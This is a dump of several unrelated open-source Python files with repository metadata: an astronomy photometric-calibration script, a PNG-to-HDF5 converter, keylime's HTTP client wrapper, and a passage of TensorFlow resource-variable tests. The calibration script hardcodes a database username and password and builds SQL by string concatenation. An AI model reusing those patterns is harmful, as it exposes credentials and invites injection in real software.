| mit | 5,229,378,662,050,004,000 | 21.946237 | 84 | 0.556232 | false |
deapplegate/wtgpipeline | photo_illum.py | 1 | 18300 | #!/usr/bin/env python
# Python module for photometric calibration.
# It needs the Python modules ppgplot and
# mpfit to be installed.
# 03.03.2005 Fixed a serious bug in the rejection loop. Instead
# of using the remaining points we always used all points
# and rejected points until the original fit matched the data
# 15.02.2005 Fixed the range of the y-axes in the plots to more
# sensible values
# 14.02.2005 Fixed a bug when more paramters were fitted than
# data points were present
# We now rescale points to the airmass/color at which
# they are plotted (zero)
# Check that label is set
# 10.12.2004 Now takes a new argument "label" to be
# used as axis label in the color plot
import copy
import getopt
import string
import sys
import mpfit
import Numeric
from ppgplot import *
import BonnLogger
def illum_funct(p, fjac=None, X=None, Y=None, y=None, err=None):
[A,B,C,D,E,F] = p
model = A*X**2 + B*Y**2 + C*X*Y + D*X + E*Y + F
status = 0
return([status, (model-y)/err])
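# Sketch of how mpfit would call illum_funct (keyword names are assumptions,
# mirroring the phot_funct_* usage in photCalib below):
#   fa = {"X": X, "Y": Y, "y": data, "err": err}
#   m = mpfit.mpfit(illum_funct, functkw=fa, parinfo=parinfo, maxiter=1000, quiet=1)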
def phot_funct_2(p, fjac=None, y=None, err=None):
model = p[0]
status = 0
return([status, (model-y)/err])
def phot_funct_1(p, fjac=None, color=None, y=None, err=None):
model = p[0] + p[1]*color
status = 0
return([status, (model-y)/err])
def phot_funct_0(p, fjac=None, airmass=None, color1=None, color2=None, y=None, err=None):
model = p[0] + p[1]*color1 + p[2]*color2
status = 0
return([status, (model-y)/err])
def readInput(file):
f = open(file, "r")
instMagList = []
stdMagList = []
magErrList = []
colList = []
airmassList = []
for line in f.readlines():
instMag, stdMag, col, airmass, instMagErr, stdMagErr = string.split(line)
magErr = (float(instMagErr)**2. + float(stdMagErr)**2.)**0.5
magErrList.append(magErr)
instMagList.append(float(instMag))
stdMagList.append(float(stdMag))
colList.append(float(col))
airmassList.append(float(airmass))
f.close()
instMag = Numeric.array(instMagList)
stdMag = Numeric.array(stdMagList)
data = stdMag - instMag
airmass = Numeric.array(airmassList)
color = Numeric.array(colList)
magErr = Numeric.array(magErrList)
return data, airmass, color, magErr
#def photCalib(dictionary, p, sigmareject, maxSigIter=50):
def photCalib(data_save, airmass_save, color_save, err_save, p, sigmareject, maxSigIter=50):
save_len = len(data_save)
parinfos = [[{"value": p[0], "fixed": 0},{"value": p[1], "fixed": 0, "limited": [0,1], "limits": [-99, 0]},{"value": p[2], "fixed": 0}],[{"value": p[0], "fixed": 0},{"value": p[1], "fixed": 0}],[{"value": p[0], "fixed": 0}]]
phot_functs = [phot_funct_0, phot_funct_1, phot_funct_2]
solutions = []
for fit_type in [0,1,2]:
airmass = copy.copy(airmass_save)
color = copy.copy(color_save)
data_tmp = copy.copy(data_save)
err = copy.copy(err_save)
#first apply coefficients we are holding fixed
data = copy.copy(data_tmp)
if fit_type == 1:
for i in range(len(data_tmp)):
data[i] = data_tmp[i] - p[1]*airmass[i]
if fit_type == 2:
for i in range(len(data_tmp)):
data[i] = data_tmp[i] - p[1]*airmass[i] - p[2]*color[i]
print data_tmp[0], data[0]
data_rec = copy.copy(data)
parinfo = parinfos[fit_type]
#for j in range(len(parinfo)):
#if j in fixedList:
# print "Element", j, "is fixed at", p[j]
# parinfo[j]["fixed"] = 1
#else:
# parinfo[j]["fixed"] = 0
for i in range(maxSigIter):
old_len = len(data)
fas = [{"airmass": airmass,"color": color, "y": data, "err": err},{"color": color,"y": data, "err": err}, {"y": data, "err": err}]
fa = fas[fit_type]
phot_funct = phot_functs[fit_type]
m = mpfit.mpfit(phot_funct, functkw=fa,
parinfo=parinfo,
maxiter=1000, quiet=1)
print m.covar, m.params, m.perror
if (m.status <= 0):
print 'error message = ', m.errmsg
condition = Numeric.zeros(len(data))
break
#airmass = copy.copy(airmass_save)
#color = copy.copy(color_save)
#data = copy.copy(data_save)
#err = copy.copy(err_save)
# Compute a 3 sigma rejection criterion
#condition = preFilter(m.params, data_save, data,
# airmass_save, airmass,
# color_save, color)
params = [0,0,0]
perror = [0,0,0]
print m.params,m.perror, m.covar
if fit_type == 0:
params = copy.copy(m.params)
perror = copy.copy(m.perror)
if fit_type == 1:
params[0] = m.params[0]
params[2] = m.params[1]
params[1] = p[1]
perror[0] = m.perror[0]
perror[2] = m.perror[1]
if fit_type == 2:
params[0] = m.params[0]
params[1] = p[1]
params[2] = p[2]
perror[0] = m.perror[0]
# Compute a 3 sigma rejection criterion
print params, data_rec[0], data[0]
condition, redchisq = SigmaCond(params, data_save, data,
airmass_save, airmass,
color_save, color, err_save, err, sigmareject)
print redchisq
# Keep everything (from the full data set!) that is within
# the 3 sigma criterion
#data_sig = Numeric.compress(condition, data_save)
data = Numeric.compress(condition, data_rec)
airmass = Numeric.compress(condition, airmass_save)
color = Numeric.compress(condition, color_save)
err = Numeric.compress(condition, err_save)
new_len = len(data)
if float(new_len)/float(save_len) < 0.5:
print "Rejected more than 50% of all measurements."
print "Aborting this fit."
break
# No change
if new_len == old_len:
print "Converged! (%d iterations)" % (i+1, )
print "Kept %d/%d stars." % (new_len, save_len)
break
print params, perror, condition
meanerr = Numeric.sum(err_save)/len(err_save)
solutions.append([params, perror, redchisq, meanerr, condition])
return solutions
def SigmaCond(p, data_save, data, airmass_save, airmass, color_save, color, err_save, err, sigmareject):
if len(data_save) > 1:
#airmass = airmass[int(0.1*len(airmass)):int(0.9*len(airmass))]
#color = color[int(0.1*len(color)):int(0.9*len(color))]
#data = data[int(0.1*len(data)):int(0.9*len(data))]
mo = p[0] + p[1]*airmass + p[2]*color
mo_save = p[0] + p[1]*airmass_save + p[2]*color_save
print len(data), len(mo), len(err)
reddm = (data-mo)/err
redchisq = Numeric.sqrt(Numeric.sum(Numeric.power(reddm, 2)) / (len(reddm) - 1))
dm = data-mo
dm_save = data_save - mo_save
mean = Numeric.sum(dm)/len(dm)
sigma = Numeric.sqrt(Numeric.sum(Numeric.power(mean-dm, 2)) / (len(dm) - 1))
#condition = Numeric.less(Numeric.fabs(dm_save), float(sigmareject) * sigma)
condition = Numeric.less(Numeric.fabs(dm_save), float(sigmareject) * err_save)
else:
condition = Numeric.zeros(len(data_save))
return condition, redchisq
def makePlots(data, airmass, color, outfile, solutions, label):
file = outfile+".ps"
pgbeg(file+"/cps", 2, 3)
pgiden()
for i in range(3):
result = solutions[i]
# Airmass plot
pgpanl(1, i+1)
airMin = 1
airMax = Numeric.sort(airmass)[-1]*1.1
print result
dataAirMax = result[0][0]+result[0][1]+1
dataAirMin = result[0][0]+result[0][1]-1
dataColMax = result[0][0]+1
dataColMin = result[0][0]-1
colMinVal = Numeric.sort(color)[0]
if colMinVal < 0:
colMin = colMinVal*1.1
else:
colMin = colMinVal*0.95
colMax = Numeric.sort(color)[-1]*1.1
if result[0] and result[1]:
eqStr = "%d parameter fit: Mag-Mag(Inst) = %.2f\\(2233)%.2f + (%.2f\\(2233)%.2f) airmass + "\
"(%.2f\\(2233)%.2f) color" % \
(3-i, result[0][0], result[1][0], result[0][1], result[1][1], result[0][2], result[1][2])
else:
eqStr = "%d parameter fit not possible" % (3-i, )
fixenv([1, airMax] ,
[dataAirMin, dataAirMax],
eqStr, label=["Airmass", "Mag - Mag(Inst)"])
condition = result[4]
goodAirmass = Numeric.compress(condition, airmass)
goodData = Numeric.compress(condition, data)
goodColor = Numeric.compress(condition, color)
badAirmass = Numeric.compress(Numeric.logical_not(condition), airmass)
badData = Numeric.compress(Numeric.logical_not(condition), data)
badColor = Numeric.compress(Numeric.logical_not(condition), color)
if len(goodData):
pgsci(3)
# Rescale to zero color and filter for data within
# our plotting range
plotData = goodData-result[0][2]*goodColor
plotCond1 = Numeric.less(plotData, dataAirMax)
plotCond2 = Numeric.greater(plotData, dataAirMin)
plotCond = Numeric.logical_and(plotCond1, plotCond2)
plotAirmass = Numeric.compress(plotCond, goodAirmass)
plotData = Numeric.compress(plotCond, plotData)
pgpt(plotAirmass, plotData, 5)
print type(plotAirmass), type(plotData)
if len(badData):
pgsci(2)
plotData = badData-result[0][2]*badColor
plotCond1 = Numeric.less(plotData, dataAirMax)
plotCond2 = Numeric.greater(plotData, dataAirMin)
plotCond = Numeric.logical_and(plotCond1, plotCond2)
plotAirmass = Numeric.compress(plotCond, badAirmass)
plotData = Numeric.compress(plotCond, plotData)
pgpt(plotAirmass, plotData, 5)
pgsci(1)
a = Numeric.arange(1, airMax, 0.01)
m = result[0][0] + result[0][1] * a
pgline(a, m)
# Color Plot
pgpanl(2, i+1)
fixenv([colMin, colMax] ,
[dataColMin, dataColMax],
eqStr, label=[label, "Mag - Mag(Inst)"])
if len(goodData):
pgsci(3)
# Rescale to zero airmass and filter for data within
# our plotting range
plotData = goodData-result[0][1]*goodAirmass
plotCond1 = Numeric.less(plotData, dataColMax)
plotCond2 = Numeric.greater(plotData, dataColMin)
plotCond = Numeric.logical_and(plotCond1, plotCond2)
plotColor = Numeric.compress(plotCond, goodColor)
plotData = Numeric.compress(plotCond, plotData)
pgpt(plotColor, plotData, 5)
if len(badData):
pgsci(2)
plotData = badData-result[0][1]*badAirmass
plotCond1 = Numeric.less(plotData, dataColMax)
plotCond2 = Numeric.greater(plotData, dataColMin)
plotCond = Numeric.logical_and(plotCond1, plotCond2)
plotColor = Numeric.compress(plotCond, badColor)
plotData = Numeric.compress(plotCond, plotData)
pgpt(plotColor, plotData, 5)
pgsci(1)
a = Numeric.arange(colMin, colMax, 0.01)
m = result[0][0] + result[0][2] * a
pgline(a, m)
return
def fixenv (xrange=[0,1], yrange=[0,1], fname="none", ci = 1, label=["x", "y"]):
# set axis ranges.
pgswin(xrange[0], xrange[1], yrange[0], yrange[1])
pgsci(ci) # set color index.
pgbox() # draw axes.
pgsci(1) # back to color index 1 (white)
pglab(label[0], label[1], fname) # label the plot
return
def saveResults(file, solutions, step, sigmareject, cluster, colorused):
f = open(file+".asc", "w")
which_solution = 0
import MySQLdb, sys, os, re
db2 = MySQLdb.connect(db='subaru', user='weaklensing', passwd='darkmatter', host='ki-rh8')
c = db2.cursor()
#c.execute("DROP TABLE IF EXISTS photometry_db")
for result in solutions:
which_solution += 1
if Numeric.sometrue(result[2]):
import os , time
user_name = os.environ['USER']
bonn_target = os.environ['BONN_TARGET']
bonn_filter = os.environ['BONN_FILTER']
time_now = time.asctime()
user = user_name #+ str(time.time())
standardstartype = os.environ['STANDARDSTARTYPE']
floatvars = {'ZP':result[0][0],'AIRMASS':result[0][1],'COLOR':result[0][2],'ZPERR':result[1][0],'AIRMASSERR':result[1][1],'COLORERR':result[1][2],'REDCHISQ':result[2],'MEANERR':result[3]}
stringvars = {'USER':user_name,'BONN_TARGET':bonn_target,'BONN_FILTER':bonn_filter,'TIME':time_now,'CHOICE':'', 'NUMBERVARS':4-which_solution,'STANDARDSTARTYPE':standardstartype,'USER': user, 'step': step, 'sigmareject':sigmareject, 'cluster':cluster,'colorused':colorused}
# make database if it doesn't exist
make_db = reduce(lambda x,y: x + ',' + y,[x + ' float(30)' for x in floatvars.keys()])
make_db += ',' + reduce(lambda x,y: x + ',' + y,[x + ' varchar(80)' for x in stringvars.keys()])
command = "CREATE TABLE IF NOT EXISTS photometry_db ( id MEDIUMINT NOT NULL AUTO_INCREMENT, PRIMARY KEY (id), " + make_db + ")"
print command
#c.execute(command)
# insert new observation
names = reduce(lambda x,y: x + ',' + y, [x for x in floatvars.keys()])
values = reduce(lambda x,y: str(x) + ',' + str(y), [floatvars[x] for x in floatvars.keys()])
names += ',' + reduce(lambda x,y: x + ',' + y, [x for x in stringvars.keys()])
values += ',' + reduce(lambda x,y: x + ',' + y, ["'" + str(stringvars[x]) + "'" for x in stringvars.keys()])
command = "INSERT INTO photometry_db (" + names + ") VALUES (" + values + ")"
print command
#c.execute(command)
f.write("%s %s %s\n" % (result[0][0], result[0][1], result[0][2]))
f.write("%s %s %s\n" % (result[1][0], result[1][1], result[1][2]))
f.write("%s#ReducedChiSq\n" % (result[2]))
f.write("%s#MeanError\n" % (result[3]))
f.write("%s\n" % (id))
else:
f.write("-1 -1 -1\n")
f.write("-1 -1 -1\n")
f.write("-1#ReducedChiSq\n")
f.write("-1#MeanError\n")
f.write("%s\n" % (id))
f.close
return id
def usage():
print "Usage:"
print "photo_abs.py -i input -f filter -n GABODSID - e ext. coeff. -c color coeff. -o output -l label"
print
print " -i, --input=STRING Input file, must have 4 columns: Instrumental Mag, Standard Mag, Color, Airmass"
print " -o, --output=STRING Output file basename"
print " -n, --night=INT GABODSID, unique numerical night identifier"
print " -e, --extinction=FLOAT Default value of extinction coefficient for one/two parameter fit"
print " -c, --color=FLOAT Default value of color term for one parameter fit"
print " -l, --label=STRING Label for color axis (e.g. B-V)"
print
print "Author:"
print " Joerg Dietrich <[email protected]>"
print
return
if __name__ == "__main__":
__bonn_logger_id__ = BonnLogger.addCommand('maskBadOverscans.py',
sys.argv[1:])
try:
opts, args = getopt.getopt(sys.argv[1:],
"i:n:o:e:c:l:s:",
["input=", "night=", "extinction=",
"color=", "output=", "label=","sigmareject=","step=","cluster=","colorused="])
except getopt.GetoptError:
usage()
BonnLogger.updateStatus(__bonn_logger_id__, 1)
sys.exit(2)
print sys.argv[1:]
infile = night = extcoeff = colcoeff = outfile = label = sigmareject = step = cluster = colorused = None
for o, a in opts:
if o in ("-i", "--input"):
infile = a
elif o in ("-o", "--output"):
outfile = a
elif o in ("-n", "--night"):
night = int(a)
elif o in ("-e", "--extinction"):
extcoeff = float(a)
elif o in ("-c", "--color"):
colcoeff = float(a)
elif o in ("-l", "--label"):
label = a
elif o in ("-s", "--sigmareject"):
sigmareject = float(a)
elif o in ("-t", "--step"):
step = a
elif o in ("-c", "--cluster"):
cluster = a
elif o in ("-u", "--colorused"):
colorused = a
else:
print "option:", o
usage()
BonnLogger.updateStatus(__bonn_logger_id__, 1)
sys.exit(2)
print cluster
#raw_input()
if not infile or night==None or not outfile or \
extcoeff==None or colcoeff==None or label==None:
#print infile, night, outfile, coeff, color
usage()
BonnLogger.updateStatus(__bonn_logger_id__, 1)
sys.exit(2)
data, airmass, color, magErr = readInput(infile)
    solutions = photCalib(data, airmass, color, magErr, [24, extcoeff, colcoeff], sigmareject)
    # Unfinished dictionary-based interface, kept for reference (not valid Python as written):
    #solutions = photCalib({'data':data, 'dataerr':dataerr, vars:{'airmass':airmass, 'color':color}, 'guesses':{'airmasscoeff': airmasscoeff, 'colorcoeff':colorcoeff}, 'sigmareject':sigmareject, fit=[{'function':func_0(airmass,color)},{'function'['color']]})
    #solutions = photCalib({'data':data, 'dataerr':dataerr, vars:{'X':X,'Y':Y}, 'sigmareject':sigmareject, fit=[['A','B','C','D','E','F'],['color']]})
makePlots(data, airmass, color, outfile, solutions, label)
saveResults(outfile, solutions, step, sigmareject, cluster, colorused)
BonnLogger.updateStatus(__bonn_logger_id__, 0)
| mit | 5,730,884,299,488,931,000 | 37.771186 | 279 | 0.556175 | false |
google/ffn | ffn/utils/png_to_h5.py | 1 | 1099 | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts PNG files from the working directory into a HDF5 volume.
Usage:
./png_to_h5.py output_filename.h5
"""
import glob
import sys
import h5py
import numpy as np
from scipy import misc
assert len(sys.argv) >= 2
png_files = glob.glob('*.png')
png_files.sort()
images = [misc.imread(i) for i in png_files]
images = np.array(images)
with h5py.File(sys.argv[1], 'w') as f:
f.create_dataset('raw', data=images, compression='gzip')
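# The resulting volume can be read back with h5py.File(sys.argv[1], 'r')['raw'].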
| apache-2.0 | 2,254,648,750,721,236,200 | 29.527778 | 80 | 0.682439 | false |
mit-ll/python-keylime | keylime/requests_client.py | 1 | 1577 | import requests
class RequestsClient:
def __init__(self, base_url, tls_enabled, **kwargs):
if tls_enabled:
self.base_url = f'https://{base_url}'
else:
self.base_url = f'http://{base_url}'
self.session = requests.Session()
for arg in kwargs:
if isinstance(kwargs[arg], dict):
kwargs[arg] = self.__deep_merge(
getattr(self.session, arg), kwargs[arg])
setattr(self.session, arg, kwargs[arg])
def request(self, method, url, **kwargs):
return self.session.request(method, self.base_url + url, **kwargs)
def head(self, url, **kwargs):
return self.session.head(self.base_url + url, **kwargs)
def get(self, url, **kwargs):
return self.session.get(self.base_url + url, **kwargs)
def post(self, url, **kwargs):
return self.session.post(self.base_url + url, **kwargs)
def put(self, url, **kwargs):
return self.session.put(self.base_url + url, **kwargs)
def patch(self, url, **kwargs):
return self.session.patch(self.base_url + url, **kwargs)
def delete(self, url, **kwargs):
return self.session.delete(self.base_url + url, **kwargs)
@staticmethod
def __deep_merge(source, destination):
for key, value in source.items():
if isinstance(value, dict):
node = destination.setdefault(key, {})
RequestsClient.__deep_merge(value, node)
else:
destination[key] = value
return destination
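# Minimal usage sketch (host, port and TLS material are assumptions):
#   client = RequestsClient("localhost:8891", tls_enabled=True,
#                           cert=("client-cert.pem", "client-key.pem"), verify=False)
#   response = client.get("/version")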
| bsd-2-clause | -8,650,900,157,701,840,000 | 33.282609 | 74 | 0.577045 | false |
gunan/tensorflow | tensorflow/python/kernel_tests/resource_variable_ops_test.py | 1 | 65396 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.resource_variable_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import gc
import os
import pickle
import re
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import tensor_pb2
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import cpp_shape_inference_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import custom_gradient
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import list_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import momentum
from tensorflow.python.training import saver
from tensorflow.python.training import training_util
from tensorflow.python.util import compat
@test_util.with_control_flow_v2
class ResourceVariableOpsTest(test_util.TensorFlowTestCase,
parameterized.TestCase):
def tearDown(self):
gc.collect()
# This will only contain uncollectable garbage, i.e. reference cycles
# involving objects with __del__ defined.
self.assertEmpty(gc.garbage)
super(ResourceVariableOpsTest, self).tearDown()
@test_util.run_deprecated_v1
def testHandleDtypeShapeMatch(self):
with self.cached_session():
handle = resource_variable_ops.var_handle_op(dtype=dtypes.int32, shape=[])
with self.assertRaises(ValueError):
resource_variable_ops.assign_variable_op(
handle, constant_op.constant(0.0, dtype=dtypes.float32)).run()
with self.assertRaises(ValueError):
resource_variable_ops.assign_variable_op(handle,
constant_op.constant(
[0],
dtype=dtypes.int32)).run()
resource_variable_ops.assign_variable_op(handle,
constant_op.constant(
0,
dtype=dtypes.int32)).run()
@test_util.run_gpu_only
def testGPUInt64(self):
with context.eager_mode(), context.device("gpu:0"):
v = resource_variable_ops.ResourceVariable(1, dtype=dtypes.int64)
self.assertAllEqual(1, v.numpy())
def testEagerNameNotIdentity(self):
with context.eager_mode():
v0 = resource_variable_ops.ResourceVariable(1.0, name="a")
v1 = resource_variable_ops.ResourceVariable(2.0, name="a")
self.assertAllEqual(v0.numpy(), 1.0)
self.assertAllEqual(v1.numpy(), 2.0)
def testEagerNameNotNeeded(self):
with context.eager_mode():
v0 = resource_variable_ops.ResourceVariable(1.0)
self.assertAllEqual(v0.numpy(), 1.0)
def testReadVariableDtypeMismatchEager(self):
with context.eager_mode():
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1], name="foo")
resource_variable_ops.assign_variable_op(handle, 1)
with self.assertRaisesRegexp(
errors.InvalidArgumentError,
"Trying to read variable with wrong dtype. "
"Expected float got int32"):
_ = resource_variable_ops.read_variable_op(handle, dtype=dtypes.float32)
def testEagerInitializedValue(self):
with context.eager_mode():
variable = resource_variable_ops.ResourceVariable(1.0, name="eager-init")
self.assertAllEqual(variable.numpy(), 1.0)
self.assertAllEqual(variable.initialized_value().numpy(), 1.0)
def testInitializeVariableUsingInitializedValue(self):
var1 = resource_variable_ops.ResourceVariable(1.0, name="var1")
var2 = resource_variable_ops.ResourceVariable(var1.initialized_value(),
name="var2")
self.assertAllEqual(var2.initialized_value(), 1.0)
def testEagerBool(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(False, name="bool_test")
self.assertAllEqual(bool(v), False)
def testEagerDeepCopy(self):
with context.eager_mode():
init_value = np.ones((4, 4, 4))
variable = resource_variable_ops.ResourceVariable(init_value,
name="init")
copied_variable = copy.deepcopy(variable)
self.assertEqual(variable.name, copied_variable.name)
self.assertEqual(variable.shape, copied_variable.shape)
self.assertEqual(variable.device, copied_variable.device)
# The copied variable should have the same value as the original.
self.assertAllEqual(variable.numpy(), copied_variable.numpy())
# Updates to the copy should not be reflected in the original.
copied_variable.assign(4 * np.ones((4, 4, 4)))
self.assertNotAllEqual(variable.numpy(), copied_variable.numpy())
@test_util.run_deprecated_v1
def testGraphDeepCopy(self):
with self.cached_session():
init_value = np.ones((4, 4, 4))
variable = resource_variable_ops.ResourceVariable(init_value,
name="init")
with self.assertRaises(NotImplementedError):
copy.deepcopy(variable)
@test_util.run_in_graph_and_eager_modes
def testStridedSliceAssign(self):
v = resource_variable_ops.ResourceVariable([1.0, 2.0])
self.evaluate(variables.global_variables_initializer())
self.evaluate(v[0].assign(2.0))
self.assertAllEqual(self.evaluate(v), [2.0, 2.0])
@test_util.run_in_graph_and_eager_modes
def testVariableShape(self):
v = resource_variable_ops.ResourceVariable([1., 1.])
self.assertAllEqual(
tensor_util.constant_value(
resource_variable_ops.variable_shape(v.handle)),
[2])
@test_util.run_deprecated_v1
def testDifferentAssignGraph(self):
with ops.Graph().as_default():
v = resource_variable_ops.ResourceVariable(1.0)
ops.reset_default_graph()
    v.assign(2.0)  # Note: this fails if we run convert_to_tensor on a graph
    # other than the variable's graph.
@test_util.run_deprecated_v1
def testFetchHandle(self):
with self.cached_session():
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1], name="foo")
self.assertNotEmpty(handle.eval())
@test_util.run_deprecated_v1
def testCachedValueReadBeforeWrite(self):
with self.cached_session() as sess:
v = resource_variable_ops.ResourceVariable(0.0, caching_device="cpu:0")
self.evaluate(v.initializer)
value, _ = sess.run([v, v.assign_add(1.0)])
self.assertAllEqual(value, 0.0)
def testAssignVariableDtypeMismatchEager(self):
with context.eager_mode():
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1], name="foo")
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([1]))
with self.assertRaisesRegexp(
errors.InvalidArgumentError, "Trying to assign variable with wrong "
"dtype. Expected int32 got float"):
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([1.], dtype=dtypes.float32))
def testRepr(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(1)
text = "%r" % v
self.assertEqual(
"<tf.Variable 'Variable:0' shape=() dtype=int32, numpy=1>", text)
def testReprUnavailable(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(1)
# Monkey-patch this variable to not have an available value
def broken_read():
raise ValueError("This doesn't work")
v.read_value = broken_read
text = "%r" % v
self.assertEqual("<tf.Variable 'Variable:0' shape=() dtype=int32,"
" numpy=<unavailable>>", text)
def testUnprintableHandle(self):
with context.eager_mode():
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1], name="foo")
self.assertIn("<unprintable>", str(handle))
self.assertIn("<unprintable>", repr(handle))
@test_util.run_in_graph_and_eager_modes
def testDtypeSurvivesIdentity(self):
handle = resource_variable_ops.var_handle_op(dtype=dtypes.int32, shape=[])
id_handle = array_ops.identity(handle)
self.evaluate(resource_variable_ops.assign_variable_op(
id_handle, constant_op.constant(0, dtype=dtypes.int32)))
def testUnreadOpName(self):
v = resource_variable_ops.ResourceVariable(1.0)
self.assertNotEqual(v.name, v.assign_add(1.0).name)
@test_util.run_in_graph_and_eager_modes
def testCreateRead(self):
handle = resource_variable_ops.var_handle_op(dtype=dtypes.int32, shape=[])
self.evaluate(resource_variable_ops.assign_variable_op(
handle, constant_op.constant(1, dtype=dtypes.int32)))
value = self.evaluate(
resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32))
self.assertAllEqual(1, value)
@test_util.run_in_graph_and_eager_modes
def testManyAssigns(self):
handle = resource_variable_ops.var_handle_op(dtype=dtypes.int32, shape=[])
create = resource_variable_ops.assign_variable_op(
handle, constant_op.constant(1, dtype=dtypes.int32))
with ops.control_dependencies([create]):
first_read = resource_variable_ops.read_variable_op(
handle, dtype=dtypes.int32)
with ops.control_dependencies([first_read]):
write = resource_variable_ops.assign_variable_op(
handle, constant_op.constant(2, dtype=dtypes.int32))
with ops.control_dependencies([write]):
second_read = resource_variable_ops.read_variable_op(
handle, dtype=dtypes.int32)
f, s = self.evaluate([first_read, second_read])
self.assertEqual(f, 1)
self.assertEqual(s, 2)
@test_util.run_in_graph_and_eager_modes
def testAssignAdd(self):
handle = resource_variable_ops.var_handle_op(dtype=dtypes.int32, shape=[])
self.evaluate(resource_variable_ops.assign_variable_op(
handle, constant_op.constant(1, dtype=dtypes.int32)))
self.evaluate(resource_variable_ops.assign_add_variable_op(
handle, constant_op.constant(1, dtype=dtypes.int32)))
read = self.evaluate(
resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32))
self.assertEqual(read, 2)
@test_util.run_in_graph_and_eager_modes
def testScatterAdd(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_add(
handle, [0], constant_op.constant([[2]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[3]])
@test_util.run_in_graph_and_eager_modes
def testGradientGatherNd(self):
v = resource_variable_ops.ResourceVariable(
np.random.uniform(size=[2, 2]), dtype=dtypes.float32)
with backprop.GradientTape() as tape:
l = array_ops.gather_nd(v, [[1, 1]])
l = math_ops.reduce_sum(l)
grads = tape.gradient(l, v)
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(self.evaluate(grads), [[0., 0.], [0., 1.]])
@test_util.run_deprecated_v1
def testDefaultGradientDtype(self):
v = resource_variable_ops.ResourceVariable(
np.random.uniform(size=[2, 2]), dtype=dtypes.float64)
c = constant_op.constant(1.)
identity = array_ops.identity_n([c, v.handle])
# TODO(b/137403775): Remove this.
custom_gradient.copy_handle_data(v.handle, identity[1])
g = gradients_impl.gradients(identity[0], [c, v.handle])
self.assertEqual(g[1].dtype, dtypes.float64)
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(g[1], [[0., 0.], [0., 0.]])
@test_util.run_deprecated_v1
def testUnconnectedGradientZeros(self):
b = resource_variable_ops.ResourceVariable(initial_value=[[3., 4.]])
c = constant_op.constant(0.)
g = gradients_impl.gradients(c, [b], unconnected_gradients="zero")[0]
self.assertAllEqual(g.shape.as_list(), [1, 2])
@test_util.run_deprecated_v1
def testGradientCondInWhileLoop(self):
v = resource_variable_ops.ResourceVariable(initial_value=1.0)
def cond(i, unused_x):
return i < 1
def body(i, x):
def true():
return x + v
def false():
return 2.0 * v
return i + 1, control_flow_ops.cond(i > 0, true, false)
_, x = control_flow_ops.while_loop(cond, body, [0, 0.0])
# Computing gradients does not produce an exception:
g = gradients_impl.gradients(x, v)
self.evaluate(variables.global_variables_initializer())
# Only the false branch is taken so the gradient is 2.
self.assertAllEqual(g[0], 2.0)
@test_util.run_in_graph_and_eager_modes
def testGradientGatherNdIndexedSlices(self):
v = resource_variable_ops.ResourceVariable(
np.random.uniform(size=[2, 2]), dtype=dtypes.float32)
with backprop.GradientTape() as tape:
l = array_ops.gather_nd(v, [[1], [1]])
l = math_ops.reduce_sum(l)
grads = tape.gradient(l, v)
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(self.evaluate(grads.values), [[1., 1.], [1., 1.]])
@test_util.run_in_graph_and_eager_modes
def testScatterSub(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_sub(
handle, [0], constant_op.constant([[2]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[-1]])
@test_util.run_in_graph_and_eager_modes
